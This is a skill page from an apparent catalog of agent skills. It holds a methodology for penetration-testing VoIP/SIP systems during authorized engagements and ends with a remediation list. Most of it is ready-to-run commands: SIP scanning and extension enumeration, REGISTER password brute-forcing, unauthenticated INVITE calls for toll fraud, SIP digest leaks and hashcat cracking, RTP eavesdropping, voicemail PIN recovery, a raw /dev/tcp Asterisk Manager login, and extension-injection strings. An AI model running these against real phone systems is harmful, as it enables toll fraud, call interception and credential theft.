pentesting-voip

$npx mdskill add xalgord/xalgorix/pentesting-voip

- Default SIP ports `5060/udp` and `5060/tcp`; TLS (`sips:`) on `5061/tcp`; RTP media on negotiated high UDP ports. PBXs often also expose `69` TFTP, `80/443` web, `389` LDAP, `3306` MySQL, `5038` Asterisk Manager (AMI), `5222` XMPP. - When `nmap` shows `5060` SIP, or you find IP phones / a PBX (Asterisk, FreePBX, Elastix, Cisco CallManager, Grandstream). - SIP is text-based (HTTP-like: INVITE, REGISTER, ACK, BYE, OPTIONS) and frequently misconfigured, enabling toll fraud, eavesdropping, and credential theft.

SKILL.md

.github/skills/pentesting-voipView on GitHub ↗
---
name: pentesting-voip
description: Testing VoIP / SIP infrastructure (default 5060/UDP+TCP, 5061/TLS, RTP media on high UDP ports) for endpoint and extension enumeration, REGISTER/digest credential cracking, unauthenticated INVITE toll fraud, SIP Digest Leak, RTP eavesdropping, and Asterisk PBX misconfiguration abuse during authorized engagements.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
- penetration-testing
- network-services
- voip
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting VoIP / SIP (port 5060)

## When to Use
- Default SIP ports `5060/udp` and `5060/tcp`; TLS (`sips:`) on `5061/tcp`; RTP media on negotiated high UDP ports. PBXs often also expose `69` TFTP, `80/443` web, `389` LDAP, `3306` MySQL, `5038` Asterisk Manager (AMI), `5222` XMPP.
- When `nmap` shows `5060` SIP, or you find IP phones / a PBX (Asterisk, FreePBX, Elastix, Cisco CallManager, Grandstream).
- SIP is text-based (HTTP-like: INVITE, REGISTER, ACK, BYE, OPTIONS) and frequently misconfigured, enabling toll fraud, eavesdropping, and credential theft.

## Quick Enumeration
```bash
# Locate SIP services (NSE + SIPVicious + sippts)
sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
svmap 10.10.0.0/24 -p 5060-5070 --fp          # SIPVicious mapper (UA=friendly-scanner, easily blocked)
sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco

# Fingerprint methods/headers and craft messages
sippts enumerate -i 10.10.0.10
sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -tu 201 -sdp

# Raw OPTIONS probe (fingerprint via Allow/Server/User-Agent)
printf "OPTIONS sip:<target> SIP/2.0\r\nVia: SIP/2.0/UDP attacker;branch=z9\r\nFrom: <sip:probe@attacker>;tag=1\r\nTo: <sip:probe@<target>>\r\nCall-ID: 1@attacker\r\nCSeq: 1 OPTIONS\r\nMax-Forwards: 70\r\nContact: <sip:probe@attacker>\r\nContent-Length: 0\r\n\r\n" | nc -u -w 2 <target> 5060
```

## Critical: Checks Most Often Missed
- **Extension/username enumeration via response differences** — `401/407` (valid) vs `404/403` (invalid) on REGISTER/INVITE leaks valid extensions:
```bash
svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
sippts exten -i 10.10.0.10 -r 5060 -e 100-200
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10   # IAX
```
- **Unauthenticated INVITE = toll fraud** — a bad Asterisk context or `allowguest=true` lets anyone place/transfer calls (billed to the victim):
```bash
sippts invite -i 10.10.0.10 -fu 200 -tu 555555555 -v          # call without auth
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444        # call + transfer
```
- **SIP Digest Leak** — INVITE a phone; when it hangs up it sends a BYE, reply `407` to force a digest auth response, then crack it offline:
```bash
sippts leak -i 10.10.0.10
```
- **RTP eavesdropping** — sniff unencrypted RTP (no SRTP/ZRTP) and replay the audio; extract DTMF (voicemail PINs).
- **Asterisk misconfig**: `type=friend` SIP-trunk ignores `host` (anyone can connect), `insecure=port,invite`, default context including `external`, AMI profiles allowing any IP.

### How to CONFIRM
- Valid extension: REGISTER/INVITE returns `401/407` while invalid ones return `404/403`.
- Toll fraud: `sippts invite` produces a `100 Trying`/`200 OK` and the external number actually rings (no auth challenge).
- Digest leak: `sippts leak` captures `Auth=Digest username=... response=...` from the victim's BYE.
- Eavesdropping: a captured RTP stream replays as intelligible audio (TLS/SRTP not in use).

## Workflow

### Step 1: Enumerate
OSINT phone numbers + Google dorks for device panels (Grandstream/Cisco/Polycom/FreePBX). Map SIP endpoints (`svmap`/`sippts scan`), fingerprint methods (`sippts enumerate`), and note adjacent services (TFTP/web/AMI).

### Step 2: Authenticate / unauth access
Enumerate extensions (`svwar`/`sippts exten`). Brute force REGISTER auth for discovered extensions:
```bash
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080
sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
```
Test for guest/unauthenticated calling (`allowguest`, bad contexts).

### Step 3: Exploit / Extract
- Place unauthenticated/transferred calls (toll fraud PoC) via `sippts invite`.
- Trigger the SIP Digest Leak and crack the response.
- Sniff and crack digests from a pcap, and reconstruct audio:
```bash
sipdump -p net-capture.pcap sip-creds.txt && sipcrack sip-creds.txt -w dict.txt
sippts dump -f capture.pcap -o data.txt && sippts dcrack -f data.txt -w wordlist/rockyou.txt
# Offline crack of an extracted SIP MD5 digest (hashcat mode 11400)
hashcat -a 0 -m 11400 sip.hash /path/to/wordlist.txt
multimon -a DTMF -t wac pin.wav      # recover DTMF (e.g. voicemail PIN) from RTP audio
```

### Step 4: Post-access / pivot
With Asterisk Manager/dialplan access:
- Dump peers via AMI: `exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3`.
- Live eavesdrop with `ChanSpy`/`ExtenSpy`; record calls with `MixMonitor`.
- Abuse RTCPBleed (RTP redirection through NAT), IVR/extension-injection (`101&SIP123123123`), and Click2Call profiles that allow any IP to originate calls.

## Key Concepts
| Concept | Description |
|---------|-------------|
| **SIP methods** | INVITE (start call), REGISTER (bind location), BYE, ACK, CANCEL, OPTIONS |
| **Digest auth** | HTTP-style MD5 (or SHA-256/512-256 per RFC 8760) challenge/response over `401/407` |
| **Extension vs username** | PBX internal IDs; username may differ from the extension |
| **RTP / SRTP / ZRTP** | Media transport; plain RTP is sniffable, SRTP/ZRTP encrypt it |
| **Asterisk context** | Dialplan grouping that governs call routing/authorization |
| **type=friend / allowguest** | Misconfigs enabling unauthenticated calls / toll fraud |

## Tools & Systems
| Tool | Purpose |
|------|---------|
| **nmap sip-methods NSE** | SIP discovery and method enumeration |
| **SIPVicious (svmap/svwar/svcrack)** | Map services, enumerate extensions, crack REGISTER |
| **sippts** | scan/enumerate/send/exten/rcrack/invite/leak/dump/dcrack/tshark |
| **sipdump / sipcrack** | Extract & brute force SIP digests from pcap |
| **hashcat (-m 11400)** | Offline SIP MD5 digest cracking |
| **enumiax** | IAX username brute force |
| **ucsniff / Wireshark** | Sniff VoIP traffic & reconstruct RTP audio |
| **multimon** | Decode DTMF tones from RTP/audio |
| **Metasploit sip modules** | options/enumerator/sipcrack scanners |

## Common Scenarios
### Scenario 1: Toll fraud via guest context
`allowguest=true` and a default context including `external`; `sippts invite` places premium-rate calls billed to the target with no authentication.

### Scenario 2: Extension enumeration + REGISTER crack
`svwar` reveals extensions 100-110; `sippts rcrack` cracks ext 100's password, allowing registration and call placement.

### Scenario 3: RTP eavesdropping
On an open/MITM'd network, unencrypted RTP is captured and replayed as audio; embedded DTMF reveals a voicemail PIN.

## Output Format
```
## VoIP / SIP Finding

**Service**: SIP (5060/udp+tcp, 5061/tls), RTP media
**Severity**: <Critical|High|Medium>
**Target**: <IP>:5060  PBX: <Asterisk/FreePBX/Cisco ...>

### Evidence
- Extensions enumerated: <100-110> (401/407 vs 404 differential)
- Unauthenticated INVITE/toll fraud: external number rang (no auth)
- SIP Digest Leak captured + cracked: ext <100> password
- RTP eavesdropping / DTMF (voicemail PIN) recovered

### Reproduction
sippts exten -i <IP> -r 5060 -e 100-200
sippts invite -i <IP> -fu 200 -tu 555555555 -v
sippts leak -i <IP>

### Recommendation
1. Use TLS (5061) for signaling and SRTP/DTLS-SRTP for media; disable cleartext
2. Asterisk: alwaysauthreject=yes, allowguest=no, per-endpoint permit/deny ACLs
3. Avoid type=friend with bare host; restrict contexts; lock down AMI/Click2Call
4. Enforce strong passwords and SHA-256/512-256 digests; add fail2ban + rate limits
5. Patch the PBX (e.g. CVE-2024-35190); restrict SIP exposure to trusted networks
```

More from xalgord/xalgorix

SkillDescription
abusing-hop-by-hop-headersTesting proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostartEnumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discoveryAPI endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigationsMethodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protectionsIdentifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sipAssessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shellsEscaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otpIdentifying and exploiting flaws in two-factor authentication and one-time password verification
deepExhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rceTesting machine-learning model files and model-loading services for remote code execution caused by insecure